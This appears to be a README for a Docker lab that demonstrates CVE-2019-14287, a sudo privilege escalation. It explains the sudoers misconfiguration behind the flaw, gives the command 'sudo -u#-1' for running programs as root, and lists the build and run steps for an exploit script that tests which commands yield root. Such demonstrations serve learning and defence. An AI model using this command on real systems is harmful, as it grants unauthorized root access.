This attack is based on the MITRE ATT&CK Privilege Escalation Tactic by using the Sudo Technique.
It makes use of the misconfiguration in the sudoers file, as described in CVE-2019-14287.
This vulnerability allows a non-root user to run commands as root. The sudo command can be run alternatively by passing user id instead of a username as an argument, along with the command. If an attacker passes -1 or 4294967295 as the user id, they can get the ability to run commands as root.
For this exploit to work successfully, the /etc/sudoers file has to be misconfigured in a specific way.
An example of said misconfiguration would be :-
<username> ALL=(ALL, !root) /bin/cat
Essentially, the configuration above gives the ability to execute /bin/cat on ALL hosts, but not as root.
This gets violated and results in root access when the user does something like :-
sudo -u#-1 /bin/cat
For the sake of brevity, I would not get into the root cause of this issue here.
The exploit works by checking various commands to see if they can be used to get root access. In cases where the attack is successful, the exploit points out the misconfigurations in the sudoers file. At the end, the exploit code generates a summary of the commands that are successful in obtaining root access.
In the case of this exploit, for demonstration purposes, the user saad is setup to have access to the bash command only.
The exploit checks for '/usr/bin/id', 'bash' and '/bin/cat' commands.
- Base OS: linux/macOS. (It can work on Windows too but hasn't been tested there)
- Open Source Software:
- Docker version 19.03.4
- docker-compose version 1.24.1
- git
The docker container is built such that it satisfies all the preconditions for successful execution of the exploit. The preconditions for successful execution of the attack are:
- OS: ubuntu:18.04
- Programs: git, python3.6, python3-pip, wget, gcc, make and sudo version 1.8.27
- Fire up the base OS and Docker. Once docker is up and running, clone this repository using
git cloneor manual download. - Open terminal in the directory where the files are located.
- Make sure that docker-compose.yml, Dockerfile, exploit.py and README.md are present before moving on to the next step.
- Run the following commands in the order specified below:
docker-compose builddocker-compose run sudoexploit
- At this point, the exploit code would run and output the results to the tty.
- If the exploit is successful, the summary line would say:-
The user can run the sudo exploit using these command(s)['bash']
Exploit successful - If no command has sudo access, the summary line would say:-
Exploit was not successful. No exploitable commands found.
- If a user other than the one specified in the exploit code tries to run the exploit, the summary line would say:-
Exploit cannot be run if user is not saad.
- Should an error occur, the summary line would say :-
An error occured during the exploit execution
- In addition to the above, the tty output is descriptive about the commands that work and don't work.
- Run the following commands in the order specified below:
docker-compose stopdocker-compose downdocker image rm sudoexploit
- Delete the directory which contains all the files on the Base OS.